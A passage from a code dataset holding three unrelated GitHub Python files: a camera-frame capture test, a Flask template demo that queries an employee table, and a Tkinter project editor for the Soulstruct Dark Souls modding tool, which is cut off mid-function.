cv2.VideoCapture(\"http://192.168.227.41:8080/video\")\n if video_capture.isOpened():\n ret_val, frame = video_capture.read()\n cv2.imwrite(\"camera.test.png\", frame)\n print(\"done\")\n video_capture.release()\n cv2.destroyAllWindows()\n else:\n print(\"Error: Unable to open camera\")\n\nif __name__ == \"__main__\":\n show_camera()","repo_name":"woflydev/odyssey_cnn","sub_path":"w_testcam.py","file_name":"w_testcam.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"11130661455","text":"#DEMO: \n# -how to make use of (jinja2) templates in Flask to develop markup efficiently\n# -separation of concerns (python code is separated from markup completely) using templates\n\n#packages needed to install\n#>pip install flask\n#>pip install mysql-connector-python\n\n#you can run this app with the following (and navigate to http://localhost:8080 in browser)\n#>python app.py\n\n\nfrom flask import Flask, render_template #necessary to work with template\nimport dbaccess as db\napp = Flask(__name__,\n static_url_path='/content', #this can be empty string if we want \"images/title.png\" directly\n static_folder='static', #map the static folder to serve files directly\n template_folder='templates' #map the templates folder so that flask picks up templates from here\n )\n\n@app.route(\"/\") #define \"root\" (or home) route (using \"route\" decorator)\ndef home(): #this function gets executed for the above route\n dbResult = db.executeQuery(\"SELECT * FROM sample.emp\") #fetch rows\n if dbResult is None:\n return \"Sorry! some problem\"\n else:\n #render template as string\n #the template uses variable \"employees\" (which contain rows) to pull data for rendering\n return render_template('employees.html', employees=dbResult) \n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080)","repo_name":"jagchat/python","sub_path":"flask/05-using-templates/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120930020","text":"from __future__ import annotations\n\n__all__ = [\"ProjectWindow\"]\n\nimport abc\nimport logging\nimport re\nimport subprocess\nimport sys\nimport threading\nimport time\nimport typing as tp\nfrom pathlib import Path\nfrom queue import Queue\n\nfrom soulstruct.containers import Binder\nfrom soulstruct.utilities.text import word_wrap\nfrom soulstruct.utilities.window import SmartFrame\n\nfrom .editors import (\n AIEditor,\n EntityEditor,\n EventEditor,\n LightingEditor,\n MapsEditor,\n ParamsEditor,\n TalkEditor,\n TextEditor,\n)\nfrom .exceptions import SoulstructProjectError, RestoreBackupError\nfrom .icon import SOULSTRUCT_ICON\nfrom .links import WindowLinker # TODO: Move to base, with game subclasses\n\nif tp.TYPE_CHECKING:\n from .core import GameDirectoryProject\n from .runtime import RuntimeManager\n\n_LOGGER = logging.getLogger(__name__)\n\n\nTAB_EDITORS = {\n \"maps\": MapsEditor,\n \"entities\": EntityEditor,\n \"params\": ParamsEditor,\n \"lighting\": LightingEditor,\n \"text\": TextEditor,\n \"events\": EventEditor,\n \"ai\": AIEditor,\n \"talk\": TalkEditor,\n} # also specifies tab order (\"runtime\" always comes last, followed by any other game-specific extras)\n\n\nclass ProjectWindow(SmartFrame, abc.ABC):\n\n PROJECT_CLASS: tp.Type[GameDirectoryProject] = None\n LINKER_CLASS: tp.Type[WindowLinker] = WindowLinker\n MAPS_EDITOR_CLASS: tp.Type[MapsEditor] = MapsEditor\n ENTITIES_EDITOR_CLASS: tp.Type[EntityEditor] = EntityEditor\n PARAMS_EDITOR_CLASS: tp.Type[ParamsEditor] = ParamsEditor\n LIGHTING_EDITOR_CLASS: tp.Type[LightingEditor] = LightingEditor\n TEXT_EDITOR_CLASS: tp.Type[TextEditor] = TextEditor\n EVENT_EDITOR_CLASS: tp.Type[EventEditor] = EventEditor\n AI_EDITOR_CLASS: tp.Type[AIEditor] = AIEditor\n TALK_EDITOR_CLASS: tp.Type[TalkEditor] = TalkEditor\n RUNTIME_MANAGER_CLASS: tp.Type[RuntimeManager] = None\n EXTRA_TAB_CLASSES = {} # maps tab names to classes\n CHARACTER_MODELS = {}\n\n maps_tab: tp.Optional[MapsEditor]\n entities_tab: tp.Optional[EntityEditor]\n params_tab: tp.Optional[ParamsEditor]\n lighting_tab: tp.Optional[LightingEditor]\n text_tab: tp.Optional[TextEditor]\n events_tab: tp.Optional[EventEditor]\n ai_tab: tp.Optional[AIEditor]\n talk_tab: tp.Optional[TalkEditor]\n runtime_tab: tp.Optional[RuntimeManager]\n\n def __init__(self, project_path=\"\", game_root=None, master=None):\n super().__init__(\n master=master,\n toplevel=True,\n icon_data=SOULSTRUCT_ICON,\n window_title=f\"{self.PROJECT_CLASS.GAME.name} Project Editor\",\n )\n self.withdraw()\n\n if not project_path:\n self.CustomDialog(\n title=\"Choose Soulstruct project directory\",\n message=\"Navigate to your Soulstruct project directory.\\n\\n\"\n + word_wrap(\n \"If you want to create a new project, create an empty directory and select it. \"\n \"The name of the directory will be the name of the project.\",\n 50,\n ),\n )\n project_path = self.FileDialog.askdirectory(\n title=\"Choose Soulstruct project directory\", initialdir=str(Path(\"~/Documents\").expanduser())\n )\n if not project_path:\n self.CustomDialog(title=\"Project Error\", message=\"No directory chosen. Quitting Soulstruct.\")\n raise SoulstructProjectError(\"No directory chosen. Quitting Soulstruct.\")\n\n self.toplevel.title(f\"{self.PROJECT_CLASS.GAME.name} Project Editor: {Path(project_path)}\")\n\n try:\n self.project = self.PROJECT_CLASS(project_path, with_window=self, game_root=game_root)\n _LOGGER.info(f\"Opened project: {project_path}\")\n except SoulstructProjectError as e:\n self.deiconify()\n msg = (\n f\"Fatal Soulstruct project error encountered (see log for full traceback):\\n\\n\"\n f\"{word_wrap(str(e), 50)}\\n\\nAborting startup.\"\n )\n _LOGGER.exception(\"Fatal Soulstruct project error encountered. Aborting startup.\")\n self.CustomDialog(title=\"Project Error\", message=msg)\n raise\n except Exception as e:\n self.deiconify()\n _LOGGER.exception(\"Fatal internal error encountered. Aborting startup.\")\n msg = (\n f\"Fatal internal error encountered (see log for full traceback):\"\n f\"\\n\\n{word_wrap(str(e), 50)}\\n\\nAborting startup.\"\n )\n self.CustomDialog(title=\"Internal Error\", message=msg)\n raise\n\n self.linker = self.LINKER_CLASS(self) # TODO: Individual editors should have a lesser linker.\n\n with self.set_master(column_weights=[1], row_weights=[0, 1], auto_rows=0, sticky=\"nsew\"):\n self.global_ribbon = self.Frame(row_weights=[1], column_weights=[1, 1, 1, 1], pady=(10, 5))\n self.page_tabs = self.Notebook(name=\"project_notebook\", sticky=\"nsew\")\n\n self.maps_tab = None\n self.entities_tab = None\n self.params_tab = None\n self.text_tab = None\n self.lighting_tab = None\n self.events_tab = None\n self.ai_tab = None\n self.talk_tab = None\n self.runtime_tab = None\n self.extra_tabs = []\n\n self.save_all_button = None\n self.save_tab_button = None\n self.export_all_button = None\n self.export_tab_button = None\n\n self.toplevel.minsize(700, 500)\n self.alphanumeric_word_boundaries()\n if getattr(sys, \"frozen\", False):\n self.toplevel.protocol(\"WM_DELETE_WINDOW\", self.confirm_quit)\n self.build()\n self.deiconify()\n\n if self.maps_tab:\n self.maps_tab.check_for_repeated_entity_ids()\n\n def build(self):\n self.build_top_menu()\n\n with self.set_master(self.global_ribbon, auto_columns=0, grid_defaults={\"padx\": 5}):\n self.save_all_button = self.Button(\n text=\"Save Entire Project\",\n width=20,\n bg=\"#622\",\n tooltip_text=\"Saves all project data types to local project files. (Ctrl + Shift + S)\",\n command=self._save_data,\n )\n self.save_tab_button = self.Button(\n text=\"Save Tab Data\",\n width=20,\n tooltip_text=\"Saves just the indicated data type to local project files. (Ctrl + S)\",\n command=lambda: self._save_data(self.current_data_type),\n )\n self.export_tab_button = self.Button(\n text=\"Export Tab Data\",\n width=20,\n tooltip_text=(\n \"Saves and exports just the indicated data type to the game directory. For Events/Talk, exports \"\n \"ONLY the currently selected script. (Ctrl + E)\"\n ),\n command=lambda: self._export_data(\n self.current_data_type,\n self.project.game_root,\n single_script_only=True,\n ),\n )\n self.export_all_button = self.Button(\n text=\"Export Entire Project\",\n width=20,\n bg=\"#622\",\n tooltip_text=\"Saves and exports ALL project data files to the game directory. (Ctrl + Shift + E)\",\n command=lambda: self._export_data(data_type=None, export_directory=self.project.game_root),\n )\n\n tab_frames = {\n tab_name: self.Frame(frame=self.page_tabs, sticky=\"nsew\", row_weights=[1], column_weights=[1])\n for tab_name in self.ordered_tabs\n }\n for tab_name in self.EXTRA_TAB_CLASSES:\n tab_frames[tab_name] = self.Frame(frame=self.page_tabs, sticky=\"nsew\", row_weights=[1], column_weights=[1])\n\n if \"maps\" in self.data_types:\n self.maps_tab = self.SmartFrame(\n frame=tab_frames[\"maps\"],\n smart_frame_class=self.MAPS_EDITOR_CLASS,\n project=self.project,\n character_models=self.CHARACTER_MODELS,\n global_map_choice_func=self.set_global_map_choice,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.maps_tab.bind(\"\", self._update_banner)\n\n self.entities_tab = self.SmartFrame(\n frame=tab_frames[\"entities\"],\n smart_frame_class=self.ENTITIES_EDITOR_CLASS,\n project=self.project,\n entities_directory=self.project.entities_directory,\n events_directory=self.project.project_root / \"events\",\n global_map_choice_func=self.set_global_map_choice,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.entities_tab.bind(\"\", self._update_banner)\n\n if \"params\" in self.data_types:\n self.params_tab = self.SmartFrame(\n frame=tab_frames[\"params\"],\n smart_frame_class=self.PARAMS_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.params_tab.bind(\"\", self._update_banner)\n\n if \"lighting\" in self.data_types:\n self.lighting_tab = self.SmartFrame(\n frame=tab_frames[\"lighting\"],\n smart_frame_class=self.LIGHTING_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.lighting_tab.bind(\"\", self._update_banner)\n\n if \"text\" in self.data_types:\n self.text_tab = self.SmartFrame(\n frame=tab_frames[\"text\"],\n smart_frame_class=self.TEXT_EDITOR_CLASS,\n project=self.project,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.text_tab.bind(\"\", self._update_banner)\n\n if \"events\" in self.data_types:\n self.events_tab = self.SmartFrame(\n frame=tab_frames[\"events\"],\n smart_frame_class=self.EVENT_EDITOR_CLASS,\n project=self.project,\n evs_directory=self.project.project_root / \"events\",\n game_root=self.project.game_root,\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n sticky=\"nsew\",\n )\n self.events_tab.bind(\"\", self._update_banner)\n\n if \"ai\" in self.data_types:\n self.ai_tab = self.SmartFrame(\n frame=tab_frames[\"ai\"],\n smart_frame_class=self.AI_EDITOR_CLASS,\n project=self.project,\n script_directory=self.project.project_root / \"ai_scripts\",\n export_directory=self.project.get_game_path_of_data_type(\"ai\"),\n allow_decompile=self.project.GAME.name == \"Dark Souls Remastered\",\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.ai_tab.bind(\"\", self._update_banner)\n\n if \"talk\" in self.data_types:\n self.talk_tab = self.SmartFrame(\n frame=tab_frames[\"talk\"],\n smart_frame_class=self.TALK_EDITOR_CLASS,\n project=self.project,\n esp_directory=self.project.project_root / \"talk\",\n global_map_choice_func=self.set_global_map_choice,\n text_font_size=self.project.text_editor_font_size,\n linker=self.linker,\n sticky=\"nsew\",\n )\n self.talk_tab.bind(\"\", self._update_banner)\n\n if self.RUNTIME_MANAGER_CLASS:\n self.runtime_tab = self.SmartFrame(\n frame=tab_frames[\"runtime\"],\n smart_frame_class=self.RUNTIME_MANAGER_CLASS,\n project=self.project,\n sticky=\"nsew\",\n )\n self.runtime_tab.bind(\"\", self._update_banner)\n\n for tab_name, smart_frame_class in self.EXTRA_TAB_CLASSES.items():\n extra_tab = self.SmartFrame(\n frame=tab_frames[tab_name],\n smart_frame_class=smart_frame_class,\n project=self.project,\n sticky=\"nsew\",\n )\n extra_tab.bind(\"\", self._update_banner)\n self.extra_tabs.append(extra_tab)\n\n for tab_name, tab_frame in tab_frames.items():\n self.page_tabs.add(tab_frame, text=f\" {data_type_caps(tab_name)} \")\n\n self.create_key_bindings()\n\n self.set_geometry()\n\n def build_top_menu(self):\n top_menu = self.Menu()\n\n file_menu = self.Menu()\n self._build_file_menu(file_menu)\n top_menu.add_cascade(label=\"File\", menu=file_menu)\n\n # TODO: edit commands\n # edit_menu = self.Menu()\n # edit_menu.add_command(label=\"Undo\", foreground='#FFF', command=lambda: print(\"Undo\"))\n # edit_menu.add_command(label=\"Redo\", foreground='#FFF', command=lambda: print(\"Redo\"))\n # edit_menu.add_command(label=\"Copy\", foreground='#FFF', command=lambda: print(\"Copy\"))\n # edit_menu.add_command(label=\"Cut\", foreground='#FFF', command=lambda: print(\"Cut\"))\n # edit_menu.add_command(label=\"Paste\", foreground='#FFF', command=lambda: print(\"Paste\"))\n # top_menu.add_cascade(label=\"Edit\", menu=edit_menu)\n\n tools_menu = self.Menu()\n self._build_tools_menu(tools_menu)\n top_menu.add_cascade(label=\"Tools\", menu=tools_menu)\n\n scripts_menu = self.Menu()\n self._build_scripts_menu(scripts_menu)\n top_menu.add_cascade(label=\"Scripts\", menu=scripts_menu)\n\n self.toplevel.config(menu=top_menu)\n\n def _build_file_menu(self, file_menu):\n save_submenu = self.Menu()\n self._build_save_submenu(save_submenu)\n file_menu.add_cascade(label=\"Save\", foreground=\"#FFF\", menu=save_submenu)\n\n file_menu.add_separator()\n\n reload_submenu = self.Menu()\n self._build_reload_submenu(reload_submenu)\n file_menu.add_cascade(label=\"Reload\", foreground=\"#FFF\", menu=reload_submenu)\n\n file_menu.add_separator()\n\n import_from_game_submenu = self.Menu()\n self._build_import_submenu(import_from_game_submenu, self.project.game_root)\n file_menu.add_cascade(label=\"Import from Game\", foreground=\"#FFF\", menu=import_from_game_submenu)\n\n import_from_submenu = self.Menu()\n self._build_import_submenu(import_from_submenu, None)\n file_menu.add_cascade(label=\"Import from...\", foreground=\"#FFF\", menu=import_from_submenu)\n\n file_menu.add_separator()\n\n export_to_game_submenu = self.Menu()\n self._build_export_submenu(export_to_game_submenu, self.project.game_root)\n file_menu.add_cascade(label=\"Export to Game\", foreground=\"#FFF\", menu=export_to_game_submenu)\n\n export_to_submenu = self.Menu()\n self._build_export_submenu(export_to_submenu, None)\n file_menu.add_cascade(label=\"Export to...\", foreground=\"#FFF\", menu=export_to_submenu)\n\n file_menu.add_separator()\n\n file_menu.add_command(label=\"Set as Default Project\", foreground=\"#FFF\", command=self._set_as_default_project)\n file_menu.add_command(label=\"Clear Default Project\", foreground=\"#FFF\", command=self._clear_default_project)\n\n file_menu.add_separator()\n\n file_menu.add_command(label=\"Quit\", foreground=\"#FFF\", command=self.confirm_quit)\n\n def _build_save_submenu(self, save_menu):\n save_menu.add_command(label=\"Save Entire Project\", foreground=\"#FFF\", command=self._save_data)\n save_menu.add_separator()\n for data_type in self.data_types:\n save_menu.add_command(\n label=f\"Save {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type: self._save_data(d),\n )\n\n def _build_reload_submenu(self, reload_menu):\n reload_menu.add_command(label=\"Reload Entire Project\", foreground=\"#FFF\", command=self._reload_data)\n reload_menu.add_separator()\n for data_type in self.data_types:\n reload_menu.add_command(\n label=f\"Reload {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type: self._reload_data(d),\n )\n\n def _build_import_submenu(self, import_menu, import_dir):\n import_menu.add_command(\n label=f\"Import Everything\",\n foreground=\"#FFF\",\n command=lambda i=import_dir: self._import_data(import_directory=i),\n )\n import_menu.add_separator()\n for data_type in self.data_types:\n import_menu.add_command(\n label=f\"Import {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type, i=import_dir: self._import_data(d, import_directory=i),\n )\n\n def _build_export_submenu(self, export_menu, export_dir):\n export_menu.add_command(\n label=f\"Export Everything\",\n foreground=\"#FFF\",\n command=lambda e=export_dir: self._export_data(export_directory=e),\n )\n export_menu.add_separator()\n for data_type in self.data_types:\n export_menu.add_command(\n label=f\"Export {data_type_caps(data_type)}\",\n foreground=\"#FFF\",\n command=lambda d=data_type, e=export_dir: self._export_data(d, export_directory=e),\n )\n\n def _build_tools_menu(self, tools_menu):\n tools_menu.add_command(label=\"Create Game Backup\", foreground=\"#FFF\", command=self._create_game_backup)\n tools_menu.add_command(label=\"Restore Game Backup\", foreground=\"#FFF\", command=self._restore_game_backup)\n tools_menu.add_separator()\n tools_menu.add_command(\n label=\"Restore .bak File\", foreground=\"#FFF\", command=lambda: self._restore_backup(full_folder=False)\n )\n tools_menu.add_command(\n label=\"Restore .bak Files\", foreground=\"#FFF\", command=lambda: self._restore_backup(full_folder=True)\n )\n tools_menu.add_separator()\n tools_menu.add_command(label=\"Unpack BND\", foreground=\"#FFF\", command=self._unpack_binder)\n tools_menu.add_command(label=\"Repack BND\", foreground=\"#FFF\", command=self._repack_binder)\n return tools_menu\n\n def _build_scripts_menu(self, scripts_menu):\n for script in self.project.custom_script_directory.rglob(\"*.py\"):\n if script.name.startswith(\"_\"):\n continue # skipped\n scripts_menu.add_command(label=script.stem, foreground=\"#FFF\", command=lambda s=script: self._run_script(s))\n scripts_menu.add_separator()\n scripts_menu.add_command(label=\"Open Console\", foreground=\"#FFF\", command=self._open_console)\n\n def _run_script(self, script_path: Path):\n \"\"\"Run given Python script `script_path` in a subprocess and wait for it to return.\"\"\"\n completed_process = self.project.run_script(script_path.absolute()) # same stdout and stderr\n if completed_process.returncode != 0:\n self.CustomDialog(\n title=\"Script Error\",\n message=f\"Script '{script_path.name}' encountered an error. It may have only partially completed.\",\n )\n return\n self.CustomDialog(\n title=\"Script Successful\",\n message=f\"Script '{script_path.name}' ran successfully.\",\n )\n\n def _open_console(self):\n try:\n # noinspection PyPackageRequirements\n import IPython\n except ImportError:\n self.CustomDialog(\n title=\"Console Error\",\n message=\"Interactive console requires the `ipython` package to be installed\\n\"\n \"in your Python environment.\",\n )\n _LOGGER.info(f\"Interactive console aborted. `ipython` package is not installed.\")\n return\n\n _LOGGER.info(\"Starting interactive console in new window. Note that it will load the LAST SAVED project data.\")\n result = subprocess.run(\n [sys.executable, \"-m\", \"soulstruct\", \"--console\", str(self.project.project_root)],\n creationflags=subprocess.CREATE_NEW_CONSOLE,\n )\n if result.returncode not in {0, 3221225786}: # second code is for window close\n self.CustomDialog(\n title=\"Console Error\",\n message=\"Interactive console encountered an error and terminated.\\n\\n\"\n \"Project data has not been reloaded, as it may have been corrupted.\\n\"\n \"If you believe the console may have written malformed data, make\\n\"\n \"sure to save your project files again from the GUI before closing it\\n.\"\n \"Otherwise, use File > Reload to load any new data written by the console.\\n\",\n )\n _LOGGER.info(f\"Interactive console exited with an unexpected return code: {result.returncode}\")\n return\n _LOGGER.info(\"Interactive console exited properly.\")\n if (\n self.CustomDialog(\n title=\"Reload Project Data?\",\n message=\"Reload maps, params, lighting, and text data to acquire any changes made in the console?\",\n button_names=(\"Yes, reload data\", \"No, do nothing\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n ) == 0:\n for data_type in self.project.DATA_TYPES:\n if data_type not in {\"maps\", \"params\", \"lighting\", \"text\"}:\n continue\n self.project.load(data_type)\n\n def alphanumeric_word_boundaries(self):\n \"\"\"See: http://www.tcl.tk/man/tcl8.5/TclCmd/library.htm#M19\"\"\"\n self.tk.call(\"tcl_wordBreakAfter\", \"\", 0)\n self.tk.call(\"set\", \"tcl_wordchars\", \"[a-zA-Z0-9_.]\")\n self.tk.call(\"set\", \"tcl_nonwordchars\", \"[^a-zA-Z0-9_.]\")\n\n def create_key_bindings(self):\n self.bind_all(\"\", lambda _: self._save_data(self.current_data_type, mimic_click=True))\n self.bind_all(\"\", lambda _: self._save_data(mimic_click=True))\n self.bind_all(\n \"\",\n lambda _: self._export_data(\n self.current_data_type, export_directory=self.project.game_root, mimic_click=True\n ),\n )\n self.bind_all(\n \"\", lambda _: self._export_data(export_directory=self.project.game_root, mimic_click=True)\n )\n\n def refresh_tab_data(self, data_type=None):\n if data_type is None:\n for data_type in self.data_types:\n self.refresh_tab_data(data_type)\n data_type = data_type.lower()\n if data_type not in self.data_types:\n raise ValueError(f\"Invalid data type name: {data_type}\")\n\n if data_type == \"events\":\n self.events_tab.scan_evs_files()\n self.events_tab.refresh()\n elif data_type == \"talk\":\n self.talk_tab.refresh()\n elif data_type == \"entities\":\n self.entities_tab.maps = self.project.maps\n self.entities_tab.refresh_entries()\n else:\n if data_type == \"params\":\n self.params_tab.refresh_entries()\n elif data_type == \"maps\":\n self.maps_tab.refresh_entries()\n self.maps_tab.check_for_repeated_entity_ids()\n elif data_type == \"lighting\":\n self.lighting_tab.refresh_entries()\n elif data_type == \"text\":\n self.text_tab.refresh_entries()\n\n def confirm_quit(self):\n if (\n self.CustomDialog(\n title=\"Quit Soulstruct?\",\n message=\"Quit Soulstruct? Any unsaved changes will be lost.\",\n button_names=(\"Yes, quit\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 0\n ):\n self.destroy()\n\n def destroy(self):\n \"\"\"Destruction takes a second or so, so we withdraw first to hide the awkward lag.\"\"\"\n self.withdraw()\n super().destroy()\n\n @property\n def current_data_type(self):\n \"\"\"Return name of current tab's data type. Could be 'runtime'.\"\"\"\n tab_index = self.page_tabs.index(self.page_tabs.select())\n data_type = self.ordered_tabs[tab_index]\n if data_type == \"entities\":\n return \"maps\"\n return data_type\n\n def set_global_map_choice(self, map_id, ignore_tabs=()):\n data_types = self.data_types\n if \"maps\" not in data_types:\n # Cannot get map to set it globally.\n return\n # noinspection PyUnresolvedReferences\n game_map = self.PROJECT_CLASS.DATA_TYPES[\"maps\"].GET_MAP(map_id)\n if \"maps\" not in ignore_tabs:\n if game_map.msb_file_stem is not None:\n self.maps_tab.map_choice.var.set(f\"{game_map.msb_file_stem} [{game_map.verbose_name}]\")\n self.maps_tab.on_map_choice()\n if \"entities\" not in ignore_tabs:\n if game_map.msb_file_stem is not None:\n self.entities_tab.map_choice.var.set(f\"{game_map.msb_file_stem} [{game_map.verbose_name}]\")\n self.entities_tab.on_map_choice()\n if \"events\" in data_types and \"events\" not in ignore_tabs:\n if game_map.emevd_file_stem is not None:\n self.events_tab.map_choice.var.set(f\"{game_map.emevd_file_stem} [{game_map.verbose_name})\")\n self.events_tab.on_map_choice()\n if \"ai\" in data_types and \"ai\" not in ignore_tabs:\n if game_map.ai_file_stem is not None:\n self.ai_tab.map_choice.var.set(f\"{game_map.ai_file_stem} [{game_map.verbose_name}]\")\n self.ai_tab.on_map_choice()\n if \"talk\" in data_types and \"talk\" not in ignore_tabs:\n if game_map.esd_file_stem is not None:\n self.talk_tab.map_choice.var.set(f\"{game_map.esd_file_stem} [{game_map.verbose_name}]\")\n self.talk_tab.on_map_choice()\n\n def _import_data(self, data_type=None, import_directory=None):\n if import_directory is None:\n import_directory = self._choose_directory()\n if not import_directory:\n return # Abort import.\n\n try:\n self._thread_with_loading_dialog(\n \"Importing\",\n f\"Importing {data_type_caps(data_type) if data_type is not None else 'all files'}...\",\n self.project.import_data,\n data_type,\n import_directory,\n )\n except Exception as ex:\n message = (\n f\"Error occurred while importing data:\\n\\n{ex}\\n\\n\"\n f\"Import operation may have only partially completed.\"\n )\n return self.CustomDialog(title=\"Import Error\", message=message)\n\n self.refresh_tab_data(data_type)\n\n def _save_data(self, data_type=None, mimic_click=False, single_script_only=False):\n if data_type == \"runtime\":\n return # nothing to save\n elif data_type == \"events\":\n # Saves '.evs.py' file(s) to project 'events' directory.\n self.events_tab.save_selected_evs() if single_script_only else self.events_tab.save_all_evs()\n if mimic_click:\n self.mimic_click(self.save_tab_button)\n return\n elif data_type == \"talk\":\n self.talk_tab.save_selected_esp()\n if mimic_click:\n self.mimic_click(self.save_tab_button)\n return\n elif data_type == \"ai\" and self.ai_tab.confirm_button[\"state\"] == \"normal\":\n self.ai_tab.confirm_selected(mimic_click=mimic_click)\n # doesn't return here\n\n if mimic_click:\n self.mimic_click(self.save_all_button if data_type is None else self.save_tab_button)\n\n self.project.save(data_type)\n if data_type is None:\n self.events_tab.save_selected_evs() if single_script_only else self.events_tab.save_all_evs()\n self.flash_bg(self)\n\n def _reload_data(self, data_type=None):\n if data_type is None:\n message = \"Are you sure you want to reload all project data? Any unsaved changes will be lost.\"\n else:\n message = f\"Are you sure you want to reload project {data_type} data? Any unsaved changes will be lost.\"\n if (\n self.CustomDialog(\n title=\"Reload Project Data?\",\n message=message,\n button_names=(\"Yes, reload data\", \"No, do nothing\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n ) != 0:\n return\n if data_type == \"runtime\":\n return # nothing to reload\n elif data_type == \"events\":\n # No need to reload `EMEVDDirectory` instance.\n self.events_tab.scan_evs_files()\n self.events_tab.refresh()\n return\n elif data_type == \"talk\":\n # No need to reload `TalkDirectory` instance.\n self.talk_tab.refresh()\n return\n\n self.project.load(data_type)\n self.flash_bg(self)\n\n def _export_data(self, data_type=None, export_directory=None, mimic_click=False, single_script_only=False):\n if export_directory is None:\n export_directory = self._choose_directory()\n if not export_directory:\n return # Abort export.\n if single_script_only and data_type is not None:\n if data_type == \"events\":\n # Specifying 'events' here means the selected script only.\n self.events_tab.save_selected_evs()\n self.mimic_click(self.save_tab_button)\n self.events_tab.export_selected_evs(export_directory)\n if mimic_click:\n self.mimic_click(self.export_tab_button)\n return\n elif data_type == \"talk\":\n # All talk scripts in selected map are exported.\n if self.talk_tab.active_row_index is not None:\n self.talk_tab.save_selected_esp()\n self.mimic_click(self.save_tab_button)\n self.talk_tab.export_all_in_map(export_directory)\n if mimic_click:\n self.mimic_click(self.export_tab_button)\n return\n # Otherwise, ignore `single_script_only` argument.\n\n if mimic_click:\n self.mimic_click(self.export_all_button if data_type is None else self.export_tab_button)\n\n try:\n self._thread_with_loading_dialog(\n \"Exporting\",\n f\"Exporting {data_type_caps(data_type) if data_type is not None else 'all files'}...\",\n self.project.export_data,\n data_type,\n export_directory,\n )\n except Exception as ex:\n caps = data_type_caps(data_type) if data_type is not None else \"all\"\n _LOGGER.error(f\"Error occurred while exporting {caps} data.\", exc_info=ex)\n message = (\n f\"Error occurred while exporting {caps} data:\\n\\n{str(ex)}\\n\\n\"\n f\"See full traceback in log. Export operation may have only partially completed.\"\n )\n if \" object has no attribute \" in str(ex):\n message += (\n f\"\\n\\nThis error may have occurred because of a change in Soulstruct's internal data.\\n\"\n f\"If you recently updated Soulstruct before seeing this error, try exporting {caps}\\n\"\n f\"with the older version (File > Export to... > Export {caps}), then importing those\\n\"\n f\"exported game files into this new version of Soulstruct (File > Import from... >\\n\"\n f\"Import {caps}).\\n\\n\"\n f\"These format-changing updates will only happen while we are\\n\"\n f\"discovering the correct data types for the handful of remaining unknown variables.\"\n )\n return self.CustomDialog(title=\"Export Error\", message=message)\n\n def _restore_backup(self, target=None, full_folder=False):\n if target is None:\n if full_folder:\n target = self.FileDialog.askdirectory(\n title=\"Choose Folder to Restore Backups\", initialdir=str(self.project.game_root)\n )\n else:\n target = self.FileDialog.askopenfilename(\n title=\"Choose File to Restore Backup\",\n initialdir=str(self.project.game_root),\n filetypes=[(\"Bak file\", \".bak\")],\n )\n if not target:\n return\n try:\n count = self.project.restore_backup(target=target)\n except RestoreBackupError as e:\n return self.CustomDialog(title=\"Restore Backup Error\", message=str(e))\n if count:\n return self.CustomDialog(\n title=\"Restore Successful\", message=f\"{count} '.bak' files restored in folder\\n'{str(target)}'.\"\n )\n return self.CustomDialog(\"Restore Successful\", f\"Backup file '{str(target)}' restored.\")\n\n def _unpack_binder(self):\n target = self.FileDialog.askopenfilename(\n title=\"Choose BND/BHD/BDT File to Unpack\", initialdir=str(self.project.game_root)\n )\n if target is None:\n return\n if not re.match(r\".*\\.[a-z]*(bnd|bhd|bdt)(\\.dcx)?$\", target):\n return self.CustomDialog(\n title=\"Invalid BND/BHD/BDT File\",\n message=f\"A BND/BHD/BDT file (with or without DCX) must be selected.\",\n )\n Binder(target).write_unpacked_dir()\n\n def _repack_binder(self):\n target = self.FileDialog.askdirectory(\n title=\"Choose Unpacked BND/BHD/BDT Directory to Repack\", initialdir=str(self.project.game_root)\n )\n if target is None:\n return\n if not re.match(r\".*\\.[a-z]*(bnd|bhd|bdt).*\", target):\n return self.CustomDialog(\n title=\"Invalid Directory\",\n message=f\"An unpacked BND/BHD/BDT directory (with a 'binder_manifest.json' file) must be selected.\",\n )\n Binder(target).write()\n\n def _set_as_default_project(self):\n \"\"\"Set this project directory as the Soulstruct default in `config.py`.\"\"\"\n from soulstruct.config import SET_CONFIG\n\n SET_CONFIG(DEFAULT_PROJECT_PATH=str(self.project.project_root))\n\n @staticmethod\n def _clear_default_project():\n from soulstruct.config import SET_CONFIG\n\n SET_CONFIG(DEFAULT_PROJECT_PATH=\"\")\n\n def _create_game_backup(self):\n backup_path = self.project.game_root / \"soulstruct-backup\"\n if backup_path.is_dir():\n if (\n self.CustomDialog(\n title=\"Confirm Backup Overwrite\",\n message=\"Backup directory `soulstruct-backup` in game directory already exists. Overwrite?\",\n button_names=(\"Yes, overwrite\", \"No, go back\"),\n button_kwargs=(\"YES\", \"NO\"),\n cancel_output=1,\n default_output=1,\n )\n == 1\n ):\n return\n try:\n self.project.create_game_backup(backup_path)\n except Exception as e:\n self.CustomDialog(\n \"Backup Error\",\n f\"Error while creating game file backup:\\n\\n\"\n f\"{e}\\n\\n\"\n f\"Backup may have only been partially completed.\",\n )\n _LOGGER.error(f\"Error while creating game file backup: {e}\", exc_info=True)\n else:\n self.CustomDialog(\"Backup Creation Successful\", \"Backup files created successfully.\")\n\n def _restore_game_backup(self):\n backup_path = self.project.game_root / 